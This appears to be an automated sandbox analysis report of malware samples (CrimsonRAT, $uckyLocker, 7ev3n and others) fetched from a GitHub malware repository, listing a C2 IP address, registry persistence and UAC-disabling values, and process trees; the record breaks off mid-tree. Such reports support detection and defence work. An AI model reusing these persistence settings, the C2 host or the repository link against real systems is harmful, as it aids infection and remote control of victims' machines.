Analysis
-
max time kernel
400s -
max time network
402s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-08-2024 21:36
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan
Resource
win10v2004-20240802-en
Errors
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan
Malware Config
Extracted
crimsonrat
185.136.161.124
Signatures
-
CrimsonRAT main payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x00070000000234b4-415.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe -
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
CrimsonRAT.exeCrimsonRAT.exeCrimsonRAT.exeCrimsonRAT.exeCrimsonRAT.exeCrimsonRAT.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation CrimsonRAT.exe -
Executes dropped EXE 17 IoCs
Processes:
Alerta.exeGas.exeCrimsonRAT.exedlrarhsiva.exeCrimsonRAT.exedlrarhsiva.exeCrimsonRAT.exedlrarhsiva.exeCrimsonRAT.exedlrarhsiva.exeCrimsonRAT.exeCrimsonRAT.exedlrarhsiva.exedlrarhsiva.exe$uckyLocker.exe7ev3n.exesystem.exepid Process 1108 Alerta.exe 2540 Gas.exe 4656 CrimsonRAT.exe 2224 dlrarhsiva.exe 428 CrimsonRAT.exe 3528 dlrarhsiva.exe 2284 CrimsonRAT.exe 436 dlrarhsiva.exe 1732 CrimsonRAT.exe 1996 dlrarhsiva.exe 540 CrimsonRAT.exe 4476 CrimsonRAT.exe 4216 dlrarhsiva.exe 2100 dlrarhsiva.exe 920 $uckyLocker.exe 5088 7ev3n.exe 4820 system.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedlrarhsiva.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tbibra_dreb = "C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe" dlrarhsiva.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
$uckyLocker.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Desktop\Wallpaper = "0" $uckyLocker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
7ev3n.exereg.execmd.exeshutdown.exeGas.exesystem.execmd.execmd.exereg.exereg.exeAlerta.execmd.exereg.execmd.exe$uckyLocker.exeSCHTASKS.execmd.exereg.execmd.exereg.execmd.exereg.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ev3n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Alerta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $uckyLocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "126" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe -
NTFS ADS 7 IoCs
Processes:
7ev3n.exemsedge.exedescription ioc Process File created C:\Users\Admin\AppData\Local\system.exe\:SmartScreen:$DATA 7ev3n.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 690237.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 174377.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 148651.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 899181.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 378450.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 559546.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepid Process 1800 msedge.exe 1800 msedge.exe 4276 msedge.exe 4276 msedge.exe 920 identity_helper.exe 920 identity_helper.exe 3564 msedge.exe 3564 msedge.exe 4548 msedge.exe 4548 msedge.exe 4440 msedge.exe 4440 msedge.exe 1580 msedge.exe 1580 msedge.exe 1580 msedge.exe 1580 msedge.exe 4636 msedge.exe 4636 msedge.exe 1680 msedge.exe 1680 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
Processes:
msedge.exepid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
shutdown.exedescription pid Process Token: SeShutdownPrivilege 2060 shutdown.exe Token: SeRemoteShutdownPrivilege 2060 shutdown.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
msedge.exepid Process 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe 4276 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid Process 968 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid Process procid_target PID 4276 wrote to memory of 1648 4276 msedge.exe 86 PID 4276 wrote to memory of 1648 4276 msedge.exe 86 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 3556 4276 msedge.exe 87 PID 4276 wrote to memory of 1800 4276 msedge.exe 88 PID 4276 wrote to memory of 1800 4276 msedge.exe 88 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89 PID 4276 wrote to memory of 2720 4276 msedge.exe 89
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffafe8546f8,0x7ffafe854708,0x7ffafe8547182⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:22⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:82⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:1228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5244 /prefetch:82⤵PID:1432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:12⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 /prefetch:82⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Users\Admin\Downloads\Alerta.exe"C:\Users\Admin\Downloads\Alerta.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵PID:3628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5068 /prefetch:82⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4548
-
-
C:\Users\Admin\Downloads\Gas.exe"C:\Users\Admin\Downloads\Gas.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5736 /prefetch:82⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:12⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:12⤵PID:2096
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4656 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:2224
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:428 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:3528
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2284 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:436
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1732 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1996
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:540 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:4216
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:4476 -
